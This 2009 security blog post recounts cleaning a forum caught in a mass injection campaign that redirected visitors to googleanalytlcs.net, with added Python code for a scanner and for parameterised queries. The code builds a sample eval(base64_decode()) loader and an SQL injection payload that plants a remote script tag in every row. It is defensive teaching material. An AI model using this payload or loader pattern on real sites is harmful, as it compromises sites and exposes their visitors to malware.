Mass Injection: Infected more than 40,000 Websites


I will be sharing a recent high-profile security breach I encountered, which was part of an infection of more than 40,000 websites worldwide. Until last year we heard of mass infections of personal computers, but 2009 marks the mass infection of websites, which is very dangerous to the millions of innocent users around the globe who visit them.

"The attack is very advanced," says Stephan Chenette, manager of security research at Websense Labs. The attacks, which began about a week ago, show no signs of slowing down, said Dancho in a post on his blog; the post also lists the high-profile sites infected by the attack.

Unfortunately one of my clients was a victim of this ongoing campaign. His popular forum had been under attack for a week: the forum home page was defaced and visitors were redirected to a malicious site, googleanalytlcs.net, so that anyone who came to his site was exposed to the attack. A closer look at the domain googleanalytlcs.net shows that the "i" in "analytics" has been replaced with a lowercase "L", which tricks users into thinking it is a site owned by Google. It is not.

I will explain how I dealt with this situation and the small decisions I made while solving the problem. I am not able to share the website address for privacy reasons, so let us call the forum xyz.com.

STAGE: 1

The owner of xyz.com called me and asked me to check his website. When I opened it in Google Chrome I saw a weird alert: "Warning: Visiting this site may harm your computer".

Warning given by Google Chrome

At first I thought the forum might contain illegal or malicious files attached by forum members, with active links to the malicious site. I scanned the database and found nothing. Then I checked the Safe Browsing advisory provided by Google to learn more about the alert, but to my surprise the advisory said the forum was clean. Seeing this, a lot of questions came up. Was Google Chrome vulnerable? I opened xyz.com in Firefox and it did not show the warning; Internet Explorer 8 showed no warning either, but crashed when attempting to load the forum. So I concluded that the behaviour had something to do with Chrome, which turned my attention to the source code of index.php.

STAGE: 2

I examined the source code of index.php, which by the usual naming convention is the first page of a website. At first glance it did not show any problem; the screenshot below shows the source code of index.php. The first arrow marks the start of the source with an opening PHP tag.


But when I scrolled to the far right of the page, towards the second arrow, I found suspicious code hidden inside the PHP tag, shown in the screenshot below.


STAGE: 3

To confirm what this code does, I copied the injected code into a file named test.php and opened it in Chrome to see what happens. Bingo! It gave the same warning. The warning is shown only the first time: the code sets a cookie named zyipppspgerfd so that the alert appears once, and if the cookie is cleared and test.php reloaded, the warning appears again. Note that a real Safe Browsing interstitial is drawn by the browser and is not controlled by the site's cookies (Firefox, which also uses Google's Safe Browsing list, showed nothing), so an alert that a site cookie can suppress is produced by the injected code itself, which is consistent with the Safe Browsing advisory reporting the forum clean. I deleted the injected code from index.php, rechecked for similar code and found nothing else. The forum was restored to normal and then checked for SQL injection vulnerabilities.

How does the infection spread?

Infection flow diagram, courtesy of Elad Sharf, Security Researcher

A little research on Google leads to the following picture. The attack starts with SQL injection of the code through a form on some page of the site, or on another site hosted on the same server, and the attackers' automated system then pushes malicious code using scareware, rogue antivirus software and exploit sites (including the latest PDF exploits). The injection plants itself at the server level, searches the folders for files with "index" or "default" in their names and replicates itself into those pages. One compromised form on one site therefore has a cascading effect on every website on the same web server. Once the attacker has compromised a legitimate website and added code that silently redirects to the exploit site, users who browse to the compromised website are sent to the exploit site without knowing it.

Injected code that produces the alert in Chrome when it tries to redirect.


Technique used to hide the exploit code from Google

The malicious code is embedded in a PHP tag and uses an obfuscation method that begins by initialising a string variable. The string is decoded with base64_decode() when the page is requested, and the script it contains is then executed by the visitor's browser. This kind of technique can employ many levels of obfuscation, where decoding one layer yields another obfuscated layer, and so on. The encoding is meant to keep search engines from scanning the payload, but Google is one step ahead and correctly flags the site as infected with malware; the obfuscation also keeps people from seeing what the code actually does. I was not able to fully decode the script into human-readable form, due to lack of time. For web application programmers working at security firms I have uploaded the obfuscated exploit code in a text file, which you can download from here. I would appreciate it if somebody could de-obfuscate the code for geniushackers.com.
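Two points above, the injector replicating into "index"/"default" pages and the layered base64_decode() wrapping, can be checked with one small tool. The following is an added example of my own, not code from the post or from the campaign: it walks a web root, looks only at files named index.* or default.*, peels nested eval(base64_decode('...')) wrappers layer by layer and reports any file where a wrapper was found or where the innermost layer mentions the googleanalytlcs.net domain. It assumes the wrapper has exactly that shape (the post only says "base64_decode" inside a PHP tag), and it builds its own constructed sample site in a temporary directory, with a placeholder payload standing in for the real redirect.

```python
import base64
import os
import re
import tempfile
from typing import List

# The injector, as described in the post, targets pages named "index" or "default".
TARGET_NAMES = re.compile(r"^(index|default)\.", re.IGNORECASE)

# Indicator taken from the post: the typo-squatted redirect domain.
INDICATOR_DOMAINS = ("googleanalytlcs.net",)

# Assumed wrapper shape: eval(base64_decode('<blob>')). Only the base64_decode
# call is matched, so a bare base64_decode('...') without eval is caught as well.
B64_CALL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")


def peel_layers(source: str, max_depth: int = 10) -> List[str]:
    """Return [original, layer1, layer2, ...] by repeatedly decoding the blob.

    Each decoded layer is searched again, which is how nested obfuscation
    ("obfuscated code leads to more obfuscated code") is unwrapped. Stops at
    the first layer with no base64_decode() call or with a blob that is not
    valid base64, and at max_depth as a guard against pathological input.
    """
    layers = [source]
    current = source
    for _ in range(max_depth):
        match = B64_CALL.search(current)
        if match is None:
            break
        blob = re.sub(r"\s+", "", match.group(1))
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:
            break  # malformed base64 (binascii.Error is a ValueError): stop here
        layers.append(decoded)
        current = decoded
    return layers


def analyse_file(path: str) -> dict:
    """Peel a single file and report how deep the wrapping goes."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        layers = peel_layers(fh.read())
    innermost = layers[-1]
    hits = [d for d in INDICATOR_DOMAINS if d in innermost]
    return {
        "path": path,
        "layers": len(layers) - 1,  # number of wrappers removed
        "indicators": hits,
        "suspicious": len(layers) > 1 or bool(hits),
        "innermost": innermost,
    }


def scan_webroot(root: str) -> List[dict]:
    """Walk the web root the way the injector does, but only to report."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if TARGET_NAMES.match(name):
                result = analyse_file(os.path.join(dirpath, name))
                if result["suspicious"]:
                    findings.append(result)
    return findings


def build_sample_site() -> str:
    """Constructed web root: a clean sub-forum index and an infected top-level index.

    The infected page hides a two-level eval(base64_decode()) wrapper far to the
    right of a normal-looking line, as in the post's screenshot.
    """
    root = tempfile.mkdtemp(prefix="xyz_site_")
    os.makedirs(os.path.join(root, "forum"))
    clean = "<?php\nrequire 'init.php';\n?>\n<html><body>forum</body></html>\n"
    inner = "echo '<script src=\"http://googleanalytlcs.net/\"></script>';"  # placeholder payload
    layer1 = "eval(base64_decode('%s'));" % base64.b64encode(inner.encode()).decode()
    layer2 = "eval(base64_decode('%s'));" % base64.b64encode(layer1.encode()).decode()
    infected = "<?php\nrequire 'init.php';" + " " * 300 + layer2 + "\n?>\n<html><body>forum</body></html>\n"
    with open(os.path.join(root, "forum", "index.php"), "w", encoding="utf-8") as fh:
        fh.write(clean)
    with open(os.path.join(root, "index.php"), "w", encoding="utf-8") as fh:
        fh.write(infected)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for finding in scan_webroot(site):
        print("%s: %d wrapper(s), indicators=%s" % (finding["path"], finding["layers"], finding["indicators"]))
        print("  innermost:", finding["innermost"][:80])
```

Run it against a real document root by calling scan_webroot("/var/www") instead of the sample site. It reports rather than cleans: once a hit is found, compare the file with a known-good backup before editing, because the same wrapper may have been planted in every index/default page on the server.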

For those interested, here is a handy list of online semi-tutorials I collected on how to de-obfuscate JavaScript in web pages and find out where hidden malware originates, what it does, and so on.

Daniel Wesemann (SANS)
===================
http://handlers.sans.org/dwesemann/decode/

SANS Internet Storm Center
=====================
http://isc2.sans.org/diary.html?storyid=2268
http://isc2.sans.org/diary.html?storyid=2358
http://isc.sans.org/diary.html?storyid=3219
http://isc.sans.org/diary.html?storyid=1519

Top-10 malware sites, by number of compromised websites referencing them (graph from the Google Online Security Blog)

The above survey was released by Niels Provos of the Google Security Team on the Google Online Security Blog on June 3, 2009. The graph shows the top-10 malware sites, counted by the number of compromised websites that referenced them. All domains on the top-10 list are suspected of having compromised more than 10,000 websites on the Internet. The graph also contains arrows indicating when these domains were first listed via the Safe Browsing API and flagged in search results as potentially dangerous. The domain googleanalytlcs.net stands 2nd on the top-10 list, which shows the gravity of the situation we are facing here.

Is WordPress affected by this mass injection?

Unfortunately WordPress version 2.6 and below is vulnerable to this kind of attack, as confirmed by the ebiquity blog, which was hacked two weeks ago. They explained that it was due to a WordPress installation exploit, and that upgrading the blog to the latest WordPress release should prevent the exploit from being used again.

Installation of the plugin Thickbox Gallery v2 also caused a file inclusion vulnerability in WordPress, discovered by Sirgod.

Which malicious website holds the payload for the attack?

According to a DNS search, the hosting malicious site was located at 91.207.61.37, in an IP block belonging to the Russian Business Network (RBN). googleanalytlcs.net now resolves into the block 91.207.61.0/24, which is part of AS48031 NOVIKOV, located in Ukraine.

How to prevent the infection/attack?


  • Check for SQL injection vulnerabilities with an up-to-date scanner, and tighten the code that processes every form on your site and web server (seek the help of your webmaster).
  • The infection is known to spread through the latest PDF exploits, which are more successful because they do not need JavaScript to work; patch your PDF reader accordingly.
  • Upgrade to the latest WordPress version, because versions below 2.6 are believed to be vulnerable to this attack.
  • Keep a backup copy of the "index" and "default" pages of the website; in case of infection it saves the time of re-coding them.
  • Shared hosting customers must be aware that the compromise of any website on the same web server will be fatal to all sites in the shared environment.
  • Do not surf the Internet while you are logged in to your web server or WordPress account.
  • Configure your firewall to block the IP used by the malicious website.
  • Subscribe to our RSS feed and stay tuned for more updates.
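The first item above says to tighten the code behind every form, and the post traces the whole cascade back to one injectable form. As an added example of my own, not from the post, here is a minimal forum "update my signature" handler in Python on sqlite3, first written with string concatenation and then with bound parameters, run against a constructed three-member table. The payload closes the string literal and rewrites the WHERE clause so that a single form submission writes a tag (a placeholder pointing at the domain named in the post) into every row; with the parameterised version the same input is stored as plain data in one row.

```python
import sqlite3
from typing import Dict

# Placeholder for the redirect tag the campaign planted; the domain is the one named in the post.
INJECTED_TAG = '<script src="http://googleanalytlcs.net/"></script>'

# Attacker-controlled form value: closes the string literal, widens the WHERE
# clause to every row, and comments out the rest of the original statement.
PAYLOAD = INJECTED_TAG + "' WHERE 1=1 --"


def make_db() -> sqlite3.Connection:
    """Constructed forum 'members' table with three accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, name TEXT, signature TEXT)")
    conn.executemany(
        "INSERT INTO members (id, name, signature) VALUES (?, ?, ?)",
        [(1, "admin", "site admin"), (2, "alice", "hello"), (3, "bob", "hi there")],
    )
    conn.commit()
    return conn


def update_signature_vulnerable(conn: sqlite3.Connection, member_id: int, signature: str) -> None:
    """The form handler as many forums wrote it in 2009: input spliced into the SQL text."""
    sql = "UPDATE members SET signature='%s' WHERE id=%d" % (signature, member_id)
    conn.execute(sql)
    conn.commit()


def update_signature_safe(conn: sqlite3.Connection, member_id: int, signature: str) -> None:
    """Same handler with a parameterised query: the value is bound as data, never parsed as SQL."""
    conn.execute("UPDATE members SET signature=? WHERE id=?", (signature, member_id))
    conn.commit()


def signatures(conn: sqlite3.Connection) -> Dict[str, str]:
    """Current signature of every member, keyed by name."""
    return {name: sig for name, sig in conn.execute("SELECT name, signature FROM members ORDER BY id")}


def infected_rows(conn: sqlite3.Connection) -> int:
    """How many members now carry the redirect domain in their signature."""
    return sum(1 for sig in signatures(conn).values() if "googleanalytlcs.net" in sig)


if __name__ == "__main__":
    db = make_db()
    update_signature_vulnerable(db, 3, PAYLOAD)  # "bob" submits the form once
    print("vulnerable handler: %d of 3 rows rewritten" % infected_rows(db))
    db = make_db()
    update_signature_safe(db, 3, PAYLOAD)
    print("parameterised handler: %d of 3 rows rewritten" % infected_rows(db))
```

With the concatenated query every member's signature now carries the tag, which is the "one compromised form" cascade the post describes. The parameterised handler stores the attacker's text in bob's row only, as an inert string; it still has to be HTML-escaped when the forum renders it, since parameter binding stops SQL injection, not script injection on output.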

Author: askoppal

11 thoughts on “Mass Injection: Infected more than 40,000 Websites”

  • February 8, 2010 at 11:56 pm

    Very nice, thanks, congrats bro … shall I use this tutorial by giving the reference to geniushackers.com?
  • January 7, 2010 at 3:52 pm

    Thanks for writing this so clearly. I also encountered the same kind of incident. My website was on Drupal, and what I did was write a bash script to clean up everything and set it up as a cron job.

    What I've done is written here: portal.shaakunthala.com/2010/01/attack-and-defence.html
    (hope you won't treat this non-clickable url as spam 🙂 )
  • October 21, 2009 at 7:06 pm

    Thanks Rosyidi, keep reading.. 🙂
  • October 10, 2009 at 5:45 pm

    I experienced the SQL injection issue a year ago; the trick is that the attacker uses the URL query string parameter to include their SQL query and insert content into your database.

    To be safe, you should always validate your query string values strictly, very strictly….

    Senthil,
    http://www.senthil.name.
  • August 4, 2009 at 12:19 pm

    Nice tutorial, publish some tutorials related to the Windows API.
  • June 18, 2009 at 5:50 pm

    Really informative article. Good job. It's hard to get customers to upgrade WordPress to the latest versions to prevent these sorts of things. I wish they would listen and just do it 🙂
  • June 11, 2009 at 2:47 pm

    Thanks Ricky and Nikhil for the comments!
  • June 7, 2009 at 12:31 am

    Very well written and informative article. I shall check my website for this kind of vulnerability.
  • June 6, 2009 at 6:52 am

    Nice article boss!!!!
    It'll certainly help many of us to prevent infections.
    Thanks!!!
